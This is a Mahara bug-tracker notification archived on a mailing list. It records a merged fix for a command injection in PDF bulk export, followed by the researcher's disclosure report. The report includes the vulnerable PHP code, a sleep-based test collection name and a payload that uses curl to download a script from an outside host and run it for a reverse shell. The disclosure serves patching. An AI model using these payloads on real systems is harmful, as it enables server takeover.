mahara-contributors team mailing list archive

Thread
Date
[Bug 1942903] A change has been merged

To: mahara-contributors@xxxxxxxxxxxxxxxxxxx
From: Mahara Bot <1942903@xxxxxxxxxxxxxxxxxx>
Date: Thu, 28 Oct 2021 02:46:04 -0000
Reply-to: Bug 1942903 <1942903@xxxxxxxxxxxxxxxxxx>
Sender: noreply@xxxxxxxxxxxxx
Reviewed:  https://reviews.mahara.org/12202
Committed: https://git.mahara.org/mahara/mahara/commit/79442bf3879049a5e49f4c1891bbd26570ac27a8
Submitter: Robert Lyon (robertl@xxxxxxxxxxxxxxx)
Branch:    21.10_DEV

commit 79442bf3879049a5e49f4c1891bbd26570ac27a8
Author: Robert Lyon <robertl@xxxxxxxxxxxxxxx>
Date:   Thu Sep 23 09:48:23 2021 +1200

Security bug 1942903: PDF export can cause command injection
vulnerability

When a person names a collection in a certain way the title can be
executed when merging the PDF pages into one collection PDF

Change-Id: Iccca05291d79fe634b40cca11dcc9153a412ab86
Signed-off-by: Robert Lyon <robertl@xxxxxxxxxxxxxxx>
(cherry picked from commit ff1a3446f5c2a4c0ca35a0f1470d9483d028efdd)

-- 
You received this bug notification because you are a member of Mahara
Contributors, which is subscribed to Mahara.
Matching subscriptions: mahara-contributors
https://bugs.launchpad.net/bugs/1942903

Title:
  Command injection vulnerability when PDF bulk export is enabled

Status in Mahara:
  Fix Released
Status in Mahara 20.04 series:
  Fix Released
Status in Mahara 20.10 series:
  Fix Released
Status in Mahara 21.04 series:
  Fix Released

Bug description:
  Hi team, I hope you're doing well! When the experimental PDF export
  feature is enabled, a user can craft a malicious collection in Mahara
  and trigger the command injection issue when an admin exports the
  attacker's data (either specifically or by exporting the institution
  the attacker belongs to).

  This was tested yesterday (2021-09-06) using the docker-compose file
  in the master branch of
  https://git.mahara.org/mahara/mahara/-/tree/master/docker

  ## Steps To Reproduce:

  URLs will be using `http://localhost:6142/mahara/` as that's my local
  instance's URL. Modify the base URL to fit your environment.

  ### Setup

  1. Login as administrator
  2. Go to the Plugin Administration page `http://localhost:6142/mahara/admin/extensions/plugins.php` and enable PDF at the bottom right of the page (installing some prerequisites on the server might be necessary, the plugins page should have instructions)

  ### Exploitation

  1. As the attacker (normal user account), create a collection named `;sleep${IFS}100;`
  2. As the administrator go to the bulk export page `http://localhost:6142/mahara/admin/users/bulkexport.php`
  3. Choose `PDF files of pages and collections` as the export format
  4. Set the attacker's username in `Usernames to export`
  5. Click `Export Accounts` and observe the 100 seconds delay in processing

  See the following section for a reverse shell example

  ## Details

  The issue comes from
  https://git.mahara.org/mahara/mahara/-/blob/master/htdocs/export/pdf/lib.php#L298

  ```php
                  $collectionname = $this->collections[$collectionid]->get('name');
                  $collectionname = parent::text_to_filename($collectionname);
                  if ($combiner == 'pdfunite') {
                      exec('pdfunite ' . implode(' ', $collection) . ' ' . $pdfdirectory . '/' . $collectionid . '_' . $collectionname . '.pdf', $output);
                  }
  ```

  `$collectionname` is user controlled and the sanitization allows just
  enough characters to be able to inject commands

  https://git.mahara.org/mahara/mahara/-/blob/master/htdocs/export/html/lib.php#L372-L375

  ```php
      public static function text_to_filename($text) {
          // truncates the text and replaces NOT allowed characters to hyphens
          return preg_replace('#["()*/:<>?\\| ]+#', '-', mb_substr($text, 0, parent::MAX_FILENAME_LENGTH, 'utf-8'));
      }
  ```

  In the attached video the malicious collection name is

  ```bash
  ;cd$IFS`mktemp$IFS-d`;curl${IFS}192.168.1.75$IFS-o${IFS}a.sh;bash${IFS}a.sh;
  ```

  and it triggered a reverse shell, see attached video. Note that I had
  to install curl on my server to make it work, but that's likely to be
  present on a real system.

  Suggested CVSS: AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H 8.0

  `AC:H` because of the setting that's likely to be disabled, `PR:L`
  because the payload is injected as a regular user, `UI:R` as it's
  triggered by an admin export, `S:C` as it impact everything on the
  server once a reverse shell is obtained.

  Let me know if you need anything else!

  Dominic

To manage notifications about this bug go to:
https://bugs.launchpad.net/mahara/+bug/1942903/+subscriptions